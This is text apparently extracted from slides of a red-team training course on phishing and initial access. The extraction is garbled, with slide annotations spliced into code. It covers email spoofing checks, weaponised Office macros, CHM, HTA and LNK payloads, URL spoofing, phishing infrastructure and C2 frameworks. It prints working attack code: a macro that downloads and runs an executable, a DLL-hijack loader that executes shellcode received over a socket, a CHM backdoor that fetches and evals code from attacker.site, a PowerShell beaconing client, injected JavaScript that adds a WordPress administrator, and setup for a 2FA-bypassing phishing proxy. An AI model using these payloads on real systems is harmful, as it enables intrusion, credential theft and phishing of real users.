Professional Documents
Culture Documents
eXtreme
Introduction
SPF
Sender Policy Framework (or SPF) is a standard to verify this
claim. To take advantage of SPF, the owner of a domain
publishes a list of authorized sending hosts in the Domain Name
System (DNS) records for that domain, in the form of a specially
formatted TXT record.
SPF
If an SPF record exists and our IP address is not included in
the record, there is good chance that the mail server will
reject our message.
SPF
For SPF to operate as intended, both the following actions
should be performed.
1. The mail server that receives a message must verify the SPF
record
2. The domain owner must create an SPF record
SPF
You should see something similar to the following for
microsoft.com.
DKIM
SPF is not capable of verifying message content. DKIM is
the standard to verify message content. DKIM is
DomainKeys Identified Mail. This mechanism is utilized by
a mail server to sign a message and its contents, so others
can confirm that it originated from that server. For the
message signing process, a DKIM-Signature header is used.
DKIM
The verification process is performed by a server, through
DNS querying the domain’s public key, to identify if the
message originated from that domain or not.
DMARC
Domain-based Message Authentication, Reporting and
Conformance (or DMARC) is a standard that enables a
domain owner to perform the following:
1. Announce DKIM and SPF usage
DMARC
To check if a domain uses DMARC, use dig to lookup a TXT
record for _dmarc.domain.com.
>> dig +short TXT _dmarc.domain.com
DMARC
Of course, DMARC will be effective only in case the
message-receiving server actively checks for the record
and acts on it.
The same applies for SPF and DKIM. If a mail server does
not actively look for and act on these countermeasures, its
users are left exposed to spoofing attacks.
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.26
1.2.1 Email delivery fundamentals
Accepted Domains
Without DMARC, SPF, and DKIM it’s difficult to verify
whether a message is a spoofing attempt. That being said,
if an organization has a crystal clear understanding of the
domain it owns, there is another protection mechanism that
can prevent spoofing of a local user. This mechanism is the
Accepted Domains feature in Microsoft Exchange.
Spam Traps
In the next slide, you can find a list of factors and email
components that are taken into consideration from spam
traps while evaluating a received email.
• Domain’s age
• Links pointing to IP addresses
• Link manipulation techniques
• Suspicious (uncommon) attachments
• Broken email content
• Values used that are different to those of the mail
headers
• Existence of a valid and trusted SSL certificate
• Submission of the page to web content filtering sites
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.29
1.2.1 Email delivery fundamentals
Circumventing Defenses
To sum up, if you’re planning to spoof a message from another
domain you should perform the following.
• Check if the domain has an SPF, DKIM, or DMARC record
• Send a message to a non-existing user and analyze the non-
delivery notice message’s headers for critical information
• If spoofing is not an option, try the legitimate approach.
Register a domain that suits your social engineering
campaign’s context and properly set SPF, DKIM, and DMARC
records for your domain.
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.30
1.2.2 Macro fundamentals
You can run the following commands to see what files are
associated with Office programs and find extensions able to
execute macros (this will not provide the entire list).
>> assoc | findstr /i “word”
Attack Vector
Development
Note: The majority of the covered payloads will be picked by A/V or EDR solutions
due to their constantly-updated signature database. That being said, with proper
obfuscation/customization you should be able to make them go past an
organization’s defenses. In the context of this module, please focus on the
development aspect only! More advanced payloads will be covered later on…
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.43
1.3.1 Custom macro development
Custom Macro
PowerShell is launched with multiple command line
arguments to create as quiet of an execution as possible.
Custom Macro
Custom Macro
ActiveX Controls
The following macro malware uses a subroutine coming from an
ActiveX control to execute its code. Specifically, it uses an InkEdit
control to automatically execute its code.
ActiveX Controls
When using ActiveX controls for macro execution, the
victim will see the following warning.
ActiveX Controls
You can find the source code on the following link:
• https://gist.github.com/anonymous/3e669b249cc1a934
3944a282cf30f0b8
ActiveX Controls
There are a large number of procedures related to ActiveX
control objects that are able to automatically run a macro.
You can see some on the following table.
ActiveX Controls
Sub InkEdit1_GotFocus()
Run = Shell("cmd.exe /c PowerShell (New-Object
System.Net.WebClient).DownloadFile('https://trusted.domain/file.exe',‘file.exe');Start-Process ‘file.exe'", vbNormalFocus)
End Sub
This is an example of downloading and executing an executable file using cmd.exe and
PowerShell. This technique is quite loud and has a very large on-disk footprint.
ActiveX Controls
The source code of this implementation can be found in the
following link:
• https://gist.github.com/anonymous/0e1abbf936438029
4b5d9004e1d68213
*To return to slide 142, click HERE. PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.60
1.3.1 Custom macro development
https://gist.github.com/anonymous/3e7efa917632078693f
9c8fdbb7cc756
End Sub
OS-aware macro
In addition, it retrieves both the victim’s hostname and
username, it base64 encodes them and finally sends them
back to a remote server.
OS-aware macro
Notes:
1. To create an OSX specific payload to use in a macro-
based attack you can use Project Empyre.
End If
End Sub
• https://astr0baby.wordpress.com/2014/02/13/customis
ing-meterpreter-loader-dll-part-2/
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.75
1.3.1 Custom macro development
RTF + Signed binary + DLL hijacking + Custom MSF loader
int MsiGetProductInfoA(int argc, char * argv[]) {
FreeConsole();
ULONG32 size;
char * buffer;
void (*function)();
winsock_init();
SOCKET my_socket = wsconnect(server, atoi(serverp)); There are two functions in msi.dll
int count = recv(my_socket, (char *)&size, 4, 0); (kavremover.exe’s DLL that is being
if (count != 4 || size <= 0) searched during execution) called
punt(my_socket, "error lenght\n"); GetInfo and MsiGetProductInfoA. We
buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE); choose MsiGetProductInfoA.
if (buffer == NULL)
punt(my_socket, "error in buf\n");
buffer[0] = 0xBF;
memcpy(buffer + 1, &my_socket, 4);
count = recv_all(my_socket, buffer + 5, size);
function = (void (*)())buffer;
function();
return 0;
}
Executable2vbs
The same could be performed with a DLL file, in case
executables are blocked. There are numerous ways to embed
and execute an executable or DLL inside an Office file. The
easiest way is using Didier Stevens’ file2vbscript python script.
Set sh = CreateObject("WScript.Shell")
sh.Run strFilename
End Sub
Writing the embedded executable to the
Sub WriteBytes(objFile, strBytes)
Dim aNumbers temporary file.
Dim iIter
aNumbers = split(strBytes)
for iIter = lbound(aNumbers) to ubound(aNumbers)
next
objFile.Write Chr(aNumbers(iIter)) Here we explain the macro’s main
End Sub functionality. In the case of an embedded DLL,
Sub DumpFile1(objFile)
WriteBytes objFile, "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0"
LoadLibrary would be called to load our library
WriteBytes
WriteBytes
objFile,
objFile,
"0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180
"33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110
9 205"
110 111" in the Office application’s process. To do this,
WriteBytes
WriteBytes
objFile,
objFile,
"116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13
"36 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 101 114 248 88 0 0 0 0 0 0 0 0 224 0 2 1
13 10"
11 1" the following should be added in our macro,
…
among other things.
Sub DumpFile(strFilename)
Dim objFSO
Private Declare Function LoadLibrary Lib
Dim objFile "KERNEL32" Alias "LoadLibraryA" (ByVal
Set objFSO = CreateObject("Scripting.FileSystemObject") strFileName As String) As Long
Set objFile = objFSO.OpenTextFile(strFilename, 2, true)
DumpFile1 objFile
Private Declare Function FreeLibrary Lib
DumpFile2 objFile "KERNEL32" (ByVal hLibrary As Long) As Long
…
Network-tracing macro
A macro malware with network tracing capabilities can
prove handy for reconnaissance activities.
• http://0entropy.blogspot.gr/2012/04/powershell-
metasploit-meterpreter-and.html
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.92
1.3.1 Custom macro development
Then you can choose either the Mouse Click or Mouse Over
tabs and then click on Run macro to associate the module
you have inserted before with the action.
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.97
1.3.1 Custom macro development
3. Edit the _rels/.rels file to add the following line right before
the last </Relationships>. <Relationship
Type=http://schemas.microsoft.com/office/2006/rel
ationships/ui/extensibility
Target=“/customUI/customUI.xml”
Id=”Rd6e72c29d34a427e” />
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.99
1.3.1 Custom macro development
Powerpoint: Custom Actions
4. Create a new directory on the same level as the _rels
directory called “customUI”.
*To return to slide 70, click HERE. **To return to slide 102, click HERE. PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.107
1.3.2 Abusing Office capabilities
OLE Objects
Object Linking and Embedding (OLE) is a proprietary technology
developed by Microsoft that allows embedding and linking to
documents and other objects.
OLE Objects
For example, a user can embed a spreadsheet (which is
data that belongs to the spreadsheet application) in a word-
processing document.
OLE Objects
There are limitless possibilities on what we can embed
inside an Office document, leveraging Office’s object linking
and embedding (OLE) capability.
OLE Objects
It should be noted that a great advantage of using OLE objects in
our social engineering engagements is the fact that we can
customize both the extension and the icon, at least before the
target actually clicks the embedded object.
OLE Objects
Navigate to Insert tab and click on Object. Then, on the
object type list choose package and locate the file you want
to embed (in this step you can customize the filename,
extension and icon of your embedded object).
OLE Objects
• Choose the OLE object you embedded. Go to the Animations
tab and click on Add Navigation. From the drop-down menu
choose OLE Action verbs and click on Activate Contents.
OLE Objects
By the time the user opens the PPSM PowerPoint file our
embedded OLE object will be triggered and a dialog will
appear requesting the user’s consent to execute the
embedded object.
2
3
https://web.archive.org/web/20161110175230/https://technet.microsoft.com/en-us/library/security/ms16-032.aspx
https://googleprojectzero.blogspot.gr/2016/03/exploiting-leaked-thread-handle.html PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.126
1.3.2 Abusing Office capabilities
https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Invoke-MS16-032.ps1
https://gist.github.com/ssherei/41eab0f2c038ce8b355acf80e9ebb980
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.127
1.3.2 Abusing Office capabilities
Case 3: Office-handled links
CHM Files
The files are compressed and deployed in a binary format
with the extension CHM, for Compiled HTML. The format is
often used for software documentation.
CHM Files
This could be easily bypassed using the download an
execute macro we covered.
https://gist.github.com/anonymous/15e99d0fd883692bd2
e300634ed3c09b
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.135
1.3.3 Uncommon extensions
CHM Files + Custom JS Backdoor
Instantiate a WinHttpRequest
<!DOCTYPE html><html><head><title>Click Me</title><head></head><body> Object.
This is a demo ! <br>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1
height=1> Initialize an HTTP request.
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" Send the HTTP request.
value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication
";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GE
T","http://attacker.site/connect",false);try{h.Send();b=h.ResponseText;eval(b);}c
atch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im Evaluate the payload.
rundll32.exe",0,true);}'>
<PARAM name="Item2" value="273,1,1">
HTML file containing a
</OBJECT>
JavaScript backdoor for CHM
<SCRIPT>
weaponization.
x.Click(); The backend is based on a
</SCRIPT> custom version of JSRat-Py
</body></html> project.
https://gist.github.com/anonymous/ce4e2c4c83d9007393
95c695cc1ec55e
*To return to slide 60, click HERE. PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.142
1.3.3 Uncommon extensions
HTA Files
Its object model, performance, rendering power and
protocol support, without enforcing the strict security
model and user interface of the browser.
From their definition you can understand that HTA files are
an ally in evading defenses. We will use HTA files
extensively in later modules to bypass numerous defense
mechanisms.
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.143
1.3.3 Uncommon extensions
HTA Files
For the time being let’s see how we can weaponize an HTA
file using the custom JavaScript backdoor we used
previously.
LNK Files
The Shell Link Binary File Format is the format of Windows
files with the extension "LNK".
LNK Files
Consequently, we can craft LNK files that reference useful
target files such as cmd.exe or PowerShell.
LNK Files
To bypass this restriction you can use the following
PowerShell script to create an LNK file with no restrictions
regarding the arguments’ string length.
LNK Files
The LNK file created with the above script establishes a
reverse TCP shell, when executed.
LNK Files
IQY files
We can leverage Web Query (IQY) files’ functionality for
credential or NTLM hash harvesting. The procedure is well
documented on the following link.
• http://www.labofapenetrationtester.com/2015/08/abusing-
web-query-iqy-files.html
MSG files
MSG file is a file format for storing Microsoft Outlook and
Exchange message files.
MSG files
For details on how MSG files can be combined with embedded
OLE objects to bypass corporate email defenses please refer to
the following links.
1. https://medium.com/@networksecurity/oleoutlook-bypass-almost-
every-corporate-security-control-with-a-point-n-click-gui-
37f4cbc107d0
2. https://www.trustwave.com/Resources/SpiderLabs-Blog/Down-
the-Rabbit-Hole--Extracting-Maliciousness-from-MSG-Files-Without-
Outlook/
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.158
1.3.3 Uncommon extensions
• c2.php:
https://gist.github.com/anonymous/e547d692d956396b6d37fdb74
c7a6417
$out.ToString()
}
The navigate2 method is utilized to manipulate the IE application’s
function callIE{
$ie = New-Object -COM internetexplorer.application
requests.
$ie.visible = $debug
$data = ""
while ($true)
{
$input = "data="+$data+"\r\n"
$enc = New-Object System.Text.ASCIIEncoding Parsing the returned page, from where the commands to be executed
$pData = $enc.GetBytes($input)
$brFlgs = 14 #// no history, no read cache, no write cache
$header = "Content-Type: application/x-www-form-urlencoded"
will be extracted.
$ie.navigate2($c2, $brFlags, 0, $pData, $header)
while ($ie.Busy)
{
Sleep 3 System.Diagnostics.Process .NET library is utilized to handle command
}
$ieHTML = $ie.Document.url
$tags = $ie.Document.IHTMLDocument3_getElementsByTagName("pre")
passing and execution.
foreach ($tag in $tags)
{
if ($tag.innerText.Contains("3nc0d3"))
{
$cmdArr = $tag.innerText -split "3nc0d3"
Client (Beaconing malware)
$data = executeCMD $cmdArr[1]
break
}
}
Sleep $callback
}
}
$ret = callIE
echo "<html><head><title>404 Not Found</title></head><body>"; Fetching the data that the beaconing malware
echo "<h1>Not Found</h1>The requested URL /c2.php was not found on this server."; posts and saving them to data.txt.
echo "<hr/>";
Credit goes to Justin Warner for coming out with the idea of
combining the abovementioned techniques.
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick
https://github.com/PowerShellMafia/PowerSploit PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.173
http://www.sixdub.net/
1.3.4 Custom ClickOnce applications
• Invoke-Shellcode.ps1:
https://gist.github.com/anonymous/d120e314fa97f9d49
3e8dcf784014961
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.177
1.4
Phishing
Techniques
Leveraging CSRF
For this we can leverage common web application vulnerabilities
such as CSRF and open/not validated redirects.
This way one can make sure that the link is pointing to the
correct or to a trusted location.
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.185
1.4.2 Creating trustworthy-looking redirect
forms
Let’s create a custom JavaScript code, with Man-In-The-
Middle capabilities, that when inserted into an HTML form,
can convince an individual that his request will actually go
to the correct or to a trusted location.
3. Route all requests to a remote server under our control, while his
browser still tries to communicate with the original PayPal
webpage.
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.187
1.4.2 Creating trustworthy-looking redirect
forms
Targeting PayPal example
To understand how can this be achieved programmatically study the
following.
• capture_redirect.js:
https://gist.github.com/anonymous/3bf8342c76eba4da3f660cbffa24f5
d8
• jquery.ba-hashchange.min.js:
https://gist.github.com/anonymous/950a70cdebd3e78b6e88312fa7d9
3250
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.188
1.4.3 URL spoofing techniques
Data URIs
A common technique for URL spoofing is abusing the data
URI scheme.
Data URIs
Data URIs follow this scheme:
data:[<mediatype>][;base64],<data>
Data URIs
This means that we can represent any content type (e.g.
image/jpeg, text/html, etc.) from the specification that is
supported by the web browser. Base64 encoding is
optional.
Data URIs
The whole procedure of spoofing a URL, abusing the data
URI in a phishing attack, usually starts with a landing page
similar to the one below.
Data URIs
Notice the amount of space characters so that only the
data:text/html,https://accounts.google.com part is visible by
the target. The data:text/html part could also be used in the
following manner data:text/html;base64,[base64 encoded
HTML source].
<meta http-equiv="Refresh" content="0;
url=data:text/html,https://accounts.google.com
<iframe src='http://attacker.domain' style=' position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%;
height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;'> Your browser doesn't support iframes
</iframe>">
This will pop an alert with the AES encrypted source code
of our phishing page.
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.200
1.4.3 URL spoofing techniques
aes_js_decrypt.html:
• https://gist.github.com/anonymous/e749f1b8fcbdb08b9
d709eb1df8b9575
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.201
1.4.3 URL spoofing techniques
https://sumofpwn.nl/advisory/2016/cross_site_request_for
gery___cross_site_scripting_in_contact_form_manager_wor
dpress_plugin.html
The attack will be successful if and only if the login form of the
login page has Autocomplete enabled. You can find the source
code in the following link.
• https://gist.github.com/anonymous/1b369a11090f1991d883
56578fc58b61
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.214
1.4.4 BeEF use cases
var ajaxRequest = new XMLHttpRequest(); Grabbing a valid CSRF token (nonce) through an
var requestURL = "/wp-admin/user-new.php"; XMLHttpRequest.
var nonceRegex = /ser" value="([^"]*?)"/g;
ajaxRequest.open("GET", requestURL, false);
ajaxRequest.send();
var nonceMatch = nonceRegex.exec(ajaxRequest.responseText); Using the fetched nonce to perform a POST
var nonce = nonceMatch[1]; request that will add ourselves as an
administrator, effectively bypassing the CSRF
var params = "action=createuser&_wpnonce_create- protection mechanism.
user="+nonce+"&user_login=attacker&email=attacker@site.com&pass1=
attacker&pass2=attacker&role=administrator";
ajaxRequest = new XMLHttpRequest();
ajaxRequest.open("POST", requestURL, true);
ajaxRequest.setRequestHeader("Content-Type", "application/x-www- Injected JavaScript to add a new admin
form-urlencoded"); (bypassing CSRF protection)
ajaxRequest.send(params);
Generic Anti-
Analysis
Apache mod_rewrite
To achieve this goal, we can utilize an apache box as a
redirector. This box will be placed between our targets and
our engagement server. Redirectors on social engineering
campaigns are dispensable.
Apache mod_rewrite
The redirector’s mission will actually be the one of a proxy.
%{REQUEST_FILENAME} %{HTTP_FORWARDED} (a|b) a or b [OR] Combine with next rule using ‘OR’ instead of the
default ‘AND’
%{REMOTE_HOST} %{HTTP_PROXY_CONNECTION} [^abc] Not In range [P] Stop Evaluating and proxy the request on behalf of the
user
%{REMOTE_PORT} %{HTTP_ACCEPT} a* Zero or more of a R[=code] Rewrite to URL with optional code (302)
\ Escape Character
We can choose which assets our box will forward for our
targets and sinkhole all other requests to a page of our
choosing.
IP Filtering
IP filtering can easily be accomplished using mod_rewrite.
IP filtering will enable us to proxy requests or redirect users
based on their IP address.
Check out slide 374 to see full reference links. PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.244
1.5.3 Generic Anti-Analysis
Although there are several ways of achieving these requirements. This example shows a basic overview where:
• The connection leaves the client infrastructure encrypted and is only decrypted once it reaches the internal red
team infrastructure.
• Public cloud services are used for redirection in order to not expose the internal infrastructure.
• Command and Controls (Long-term and interactive), phishing and payload team servers are segregated. If the
defense team identifies one of them as suspicious, it does not compromise the whole exercise and it can be easily
readapted.
Domain Categorization
Although domains can be purchased and categorized, this increases the time and money
needed for the operation. Chameleon is a tool to assist domain categorization.
It is usually a better option to buy pre-categorized domains that have been used legitimately and
gone through this process. ExpiredDomains is a good resource for finding previously used
domains and reputation can be checked using Virustotal or Bluecoat. This process can be
automated using DomainHunter.
Do not forget to check the history of IP Addresses for a domain, it may give clues about its use
or legitimacy.
Check out slide 375 to see full reference links. PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.248
1.5.3.1 Red Team Infrastructure
Traffic Inspection
Some security products do not inspect or
decrypt domains associated to Health
and wellness, Personal privacy, finance
and banking by default. It is
recommended to put the domains used
for the exercise under any of these
categories
Propagation
Always use DNSChecker to make sure
the DNS settings are propagated
correctly.
Phishing
Setting up a phishing infrastructure tends to be a complex process. The
easiest method is to use disposable VPS or third-party services (Review
TOS) trusted by the client for sending emails and keep the phishing
framework in the internal infrastructure.
Some available phishing frameworks:
• GoPhish (https://getgophish.com)
• Phishing Frenzy (https://www.phishingfrenzy.com/)
• King Phisher (https://github.com/securestate/king-phisher)
• The Social-Engineer Toolkit (https://www.trustedsec.com/tools/the-
social-engineer-toolkit-set/)
SMTP Servers
In case a disposable VPS service is used, it is really
important to remove previous server headers and
configure catch-all addresses to receive bounced emails
or any user responses.
SMTP Servers
Once the server is configured and the DNS records
are set. There are 2 checks that should be done
before sending an email to a real provider in order to
avoid be marked as SPAM due to configuration
errors.
MX Toolbox (https://mxtoolbox.com)
Add the domain and click into “Find problems” to
detect possible configuration issues.
Mail-Tester (https://mail-tester.com)
Mail tester is a service for rating emails. It will
perform checks in the content with SpamAssassin
and some configuration and blacklist checks.
https://mxtoolbox.com/
https://mail-tester.com/ PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.252
1.5.3.1 Red Team Infrastructure
Redirectors
Red team servers should have a redirector placed in front of
it for obfuscating the backend infrastructure from incident
response teams.
Socat
Socat is a command line based utility that establishes two bidirectional
byte streams and transfers data between them. This can also be used
to redirect TCP and UDP connections between hosts, although a
session needs to be left opened on the redirector. Tmux or screen con
be used for that purpose and be aware that traffic must be allowed in
the firewall. Basic redirector examples are:
# DNS Redirector
socat udp4-recvfrom:53,reuseaddr,fork udp4-sendto:<DEST IP>; echo –ne
# HTTP Redirector
socat TCP4-LISTEN:80,bind=<Interface IP>,fork TCP4:<DEST IP>:80
Iptables
Iptables can be used to forward traffic from one host to another,
it provides the filtering capabilities included in iptables itself and
can be used to redirect either TCP or UDP Traffic, so using it can
be used for DNS Redirectors, HTTP, TCP, etc. For example this
rules can be used to redirect DNS Traffic associated to DNSCat2.
# DNSCat2 Server to accept connections only from redirector
iptables -I INPUT 6 -p udp –m udp --dport 53 -s <REDIRECTOR IP> -j ACCEPT -m comment --comment "ACCEPT DNS Connections from the redirector”
# REDIRECTOR
sysctl –w net.ipv4.ip_forward=1
iptables -I INPUT -p udp -m udp --dport 53 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination <DNSCAT2 SERVER IP>:53
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
In order to avoid problems with the connection and avoid password attacks,
authentication should be set to PKI only and autossh must be used to restart the
connection in case it drops. Some OpenSSH Tunnel examples:
# Add the following lines in /etc/ssh/sshd_config
GatewayPorts yes
AllowTcpForwarding yes
# Forward Red Team Server port 80 to Redirector port 80
tmux new –s TCP_REDIR80
autossh -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -R \*:80:0.0.0.0:80 <USER>@<Redirector IP>
Once the files and valid certificate has been generated, the
configuration files needed for nginx to work can be created
with the help of https://nginxconfig.io.
OPSEC Considerations
• Consider using iptables & ipset to restrict to only needed
protocols and countries
• As mentioned before, harden your ssh configuration and
preferably allow only connections from a trusted host.
• Keep systems updated, do not roll up outdated instances
• Monitor IP and Domain Blacklists
• Monitor logs and consider using RedElk
• Consider Ansible for ease of deployment and hardening
• Change default umask to a more restrictive one and chattr all
sensitive directories
https://infosec.mozilla.org/guidelines/openssh.html
https://github.com/outflanknl/RedELK PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.262
1.5.3.2 Phishing with Reverse Proxies
Reverse proxies sit between the user and the target website
and can show the legitimate content to the user while
capturing credentials and tokens that can be used to
impersonate a user’s session.
https://conference.hitb.org/hitbsecconf2019ams/materials/D2T1 - Muraena
- The Unexpected Phish - Michele Orru & Giuseppe Trotta.pdf PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.265
1.5.3.2 Phishing with Reverse Proxies
VPS Server
In this case, the Linux Distribution selected is Debian 10,
but any distribution supporting the installation of Docker
and GoLang <= 1.12 should do the trick.
#!/bin/bash
apt update && apt install golang-1.13 certbot docker docker-compose docker.io make
export PATH=$PATH:/usr/lib/go-1.13/bin && echo “export PATH=$PATH:/usr/lib/go-1.13/bin” >>
~/.bashrc
export GOPATH=$HOME/go && echo ”export GOPATH=$HOME/go” >> .bashrc
go get github.com/muraenateam/muraena
cd $GOPATH/src/github.com/muraenateam/muraena
make build
go get github.com/muraenateam/necrobrowser
cd $GOPATH/src/github.com/muraenateam/necrobrowser
make build
✓ Once the DNS records have been propagated (DNSChecker), continue with the
certbot command to receive the wildcard certificate.
https://dnschecker.org/ PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.268
1.5.3.2 Phishing with Reverse Proxies
Muraena Configuration
In this example the Google template will be modified in
order to capture sessions bypassing 2FA.
Once the configuration has been changed, the muraena proxy and necrobrowser can
be started by issuing the following commands from their respective folders:
• ./muraena --config $(pwd)/config/google.com.json
• ./necrobrowser --token "ada9f7b8-6e6c-4884-b2a3-ea757c1eb617”
Evasive C2
Frameworks
Overview
SilentTrinity follows the Bring Your Own Interpreter (BYOI)
approach and features embedding 3rd party scripting
languages into .Net.
If an installation from source is preferred, the main requirements are Python3, Pyenv
and pipenv.
Connection
A client-server architecture is used by SilentTrinity, for this
reason, a Team Server needs to be launched and placed behind a
redirector that can be operated via another host or the same one.
Just make sure that only authorized hosts are able to connect to
the management interface and always ensure that the certificate
fingerprints between client and server match.
# Server
> python teamserver.py <local ip to listen> <password>
# Client/Operator
> python st.py wss://<user>:<password>@<team_serverip>:<port>
Setting up a listener
The team server will be placed behind a redirector providing
a valid certificate. At this point the self-signed certificate
from SilentTrinity is irrelevant. Setting a basic listener is as
simple as providing the following parameters:
• Name: Name of the listener, default to https
• BindIP: The IPv4/IPv6 Address to bind the listener to
• Port: Port for the listener, default to 443
Interacting
When the stager is executed in the target machine, a new session
should appear on SilentTrinity’s interface.
This can be confirmed using the command ‘sessions’ and ‘list’ to view
the active sessions.
These sessions can be renamed in order to easily identify them using
the command ‘rename’.
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.286
1.6.1 SilentTrinity
boo/ps: Discover processes running on the target with the following properties:
• Yellow: Current process
• Magenta: Web browser
• Blue: Background windows process
• Red: AV/HIDS
• Cyan: Sysadmin/Security Tools
• White: Developer tools, virtualization tools, misc.
• Green: Managed process, safe to inject as it has the .NET CLR Loaded.
• Attributes: Blinking affects OPSec and Bold are Injectable high-integrity processes.
Installation
For installing Covenant we need to first install .Net core
SDK on Linux. Latest version of .Net-SDK is 3.0, however
Covenant at the moment is using 2.2, for this reason, once
adding Microsoft key and feed has been finished, the
following code needs to be executed.
# Install .Net sdk-2.2
apt update && apt install apt-transport-https dotnet-sdk-2.2
# Install Covenant
git clone --recurse-submodules https://github.com/cobbr/Covenant /opt/Covenant
cd /opt/Covenant/Covenant
dotnet build
dotnet run
https://dotnet.microsoft.com/download/linux-package-manager/debian10/sdk-current
https://github.com/cobbr/Covenant PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.297
1.6.2 Covenant
Listeners
Covenant support listener profiles for controlling the
communication between listener and grunts.
New profiles can be created in Listeners -> Profiles menu. The details
needed to create a new profile are:
• Name: Name assigned to this profile
• Description: Should be documented in order to understand how the
profile works
• MessageTransform: Must be a Static C# class, cross-platform
compatible and compile under Net40, Net35 and NetCore21 It must
have a public Transform and Invert functions that mirrors each
other. It specifies how the communication data will be transformed
before being placed into HTTP Requests.
• HttpUrls: Used for grunts callbacks, they will be randomly selected
each time. The grunt GUI must be present here or in a single
HttpRequestHeader using (“{GUID}”).
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.301
1.6.2 Covenant
Launchers
Launchers are used to generate and host binaries scripts or one-
liners to launch grunts for the selected listener. Currently there
are some predefined launchers:
• Binary: Generate custom binaries launching a grunt. These
can be .NET40, .NET35 or .NETCore21.
• Powershell: Generates powershell launcher or one-liner
• MSBuild: Generates an XML file that can be used with
msbuild.exe
• InstallUtil: Generates a XML file that can be used with
installutil.exe
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.305
1.6.2 Covenant
https://github.com/tyranid/DotNetToJScript
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.306
1.6.2 Covenant
Tasks
Are the modules or built-in functions that can be executed
on grunts. These modules can be configured or created
using:
• Reference Assemblies: .NET assemblies referenced by a
Reference Source Library or Task. It will be included in
the task’s compilation
• Embedded Resources: Data files needed by a task.
Included as a resource in the task’s compilation.
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.307
1.6.2 Covenant
Grunts
Covenant’s implants appear here. The tabs in this section are:
• Info: Detailed information about the grunt. Delay, Jitter Killdate
and ConnectAttemps can be edited here.
• Interact: Command-line interface for interacting with the
grunts it has suggestions and autocomplete enabled
• Task: Configure a task execution for the grunt using the GUI
• Taskings: History of tasks and details executed in the grunt.
It is recommended to
perform safety checks
using Seatbelt module
before interacting with
the grunt.
Stay put…
ID;P
O;E
NN;NAuto_open;ER101C1
C;X1;Y101;EEXEC("CALC.EXE")
C;X1;Y102;EHALT()
E
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.321
1.7.1 Excel 4.0 Macros
https://support.office.com/en-us/article/get-transform-in-excel-881c63c6-37c5-4ca2-b616-59e18d75b4de
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.342
1.7.5 Abusing Excel Features
https://github.com/lgandx/Responder
https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbserver.py PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.343
1.7.5 Abusing Excel Features
In this case,
\\192.168.1.42\ELS\data.tx.
https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator/tree/master
PTXv2: Section 1, Module 1 - Caendra Inc. © 2020 | p.350
1.7.6 Evading Sandboxes and Application Whitelisting
Using this template the payload will only execute if the DOMAIN
matches the configured one in “encodedvars” keys and msbuild
will be used to bypass application whitelisting.
